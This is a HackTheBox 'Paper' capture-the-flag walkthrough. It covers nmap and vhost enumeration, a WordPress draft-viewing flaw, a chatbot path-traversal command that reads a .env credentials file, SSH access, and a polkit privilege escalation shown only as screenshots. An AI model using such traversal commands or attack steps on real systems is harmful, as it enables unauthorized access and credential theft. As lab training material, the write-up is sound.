HacktheBox - Paper

This machine revolves around a CVE that was disclosed around the time the machine was released.


Enumeration

Nmap

In the scan we find only 3 open ports:

22 -> SSH

80 -> HTTP

443 -> HTTPS

# Nmap 7.91 scan initiated Sat Feb 12 16:31:45 2022 as: nmap -sCV -v -T5 -Pn -oN nmap/scanport.log 10.10.11.143
Warning: 10.10.11.143 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.11.143
Host is up (0.065s latency).
Not shown: 577 filtered ports, 420 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
|   256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_  256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp  open  http     Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_http-title: HTTP Server Test Page powered by CentOS
443/tcp open  ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Issuer: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-07-03T08:52:34
| Not valid after:  2022-07-08T10:32:34
| MD5:   579a 92bd 803c ac47 d49c 5add e44e 4f84
|_SHA-1: 61a2 301f 9e5c 2603 a643 00b5 e5da 5fd5 c175 f3a9
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 12 16:34:09 2022 -- 1 IP address (1 host up) scanned in 144.47 seconds

Technology

Looking at the technologies used by the machine (fingerprinting summary below), I see a domain in the X-Backend header:

  • office.paper
Summary: Email[webmaster@example.com], PoweredBy[CentOS], MetaGenerator[HTML Tidy for HTML5 for Linux version 5.7.28], UncommonHeaders[x-backend-server], HTTPServer[CentOS]
[Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9], OpenSSL[1.1.1k], Apache[2.4.37][mod_fcgid/2.3.9], HTML5, X-Backend[office.paper]

Subdomains

We add these to /etc/hosts:

  • office.paper
  • chat.office.paper
  • office.htb

The chat subdomain was found with a vhost brute force:

gobuster vhost -u http://office.paper -w ~/Documents/Seclists/Discovery/DNS/subdomains-top1million-110000.txt -z -q

Found: chat.office.paper (Status: 200) [Size: 223163]

Potential Users

Looking at the blog comments, we can pick out possible usernames:

  • Nick
  • prisonmike

Here is a hint that some content (a draft) has not been deleted:

[screenshot: wordpress-comment]

Here we see a vulnerability that allows us to view the drafts:

https://wpscan.com/vulnerability/3413b879-785f-4c9f-aa8a-5a4a1d5e0ba2

Chat

Seeing this, we realize that we need a specific URL:

[screenshot: rocket-chat]

Vuln

http://office.paper/?static=1

Following the steps for exploiting this vulnerability, we gain access to the draft:

[screenshot: wp-leak]

Register

With this, we already have access to the internal chat:

http://chat.office.paper/register/8qozr226AhkCHZdyY

[screenshot: channel-general]

Bot Testing (Shell as Dwight)

Testing the bot, I realize that I can read files from the server; here I found an interesting file, .env:

recyclops file ../../../../../home/dwight/hubot/.env

[screenshot: directory-traversal-1]

PrivEsc

With the password found there, we can log in over SSH as the user dwight:

ssh dwight@10.10.11.143                                                                   
dwight@10.10.11.143's password:                                                                    
Activate the web console with: systemctl enable --now cockpit.socket                               
                                                                                                   
Last login: Tue Feb  1 09:14:33 2022 from 10.10.14.23                                              
[dwight@paper ~]$ id                                                                               
uid=1004(dwight) gid=1004(dwight) groups=1004(dwight)                                              
[dwight@paper ~]$ clear                                                                            
[dwight@paper ~]$ ls                                                                               
bot_restart.sh  hubot  sales  user.txt
[dwight@paper ~]$ cat user.txt 
e5e2ef480b8d49dd2dd1be31c1384812
[dwight@paper ~]$ 

With linpeas I see an interesting piece of information: the machine has polkit installed:

[screenshot: polkit-linpeas]

Python

We can use this exploit written in Python:

[screenshot: exploit-python]

[screenshot: root-flag]

Bash

Alternatively, we can use this exploit written in Bash:

[screenshot: exploit-run-sh]

MACHINE PWNED!!!!!

© 2021 - 2024 B3nj1. All rights reserved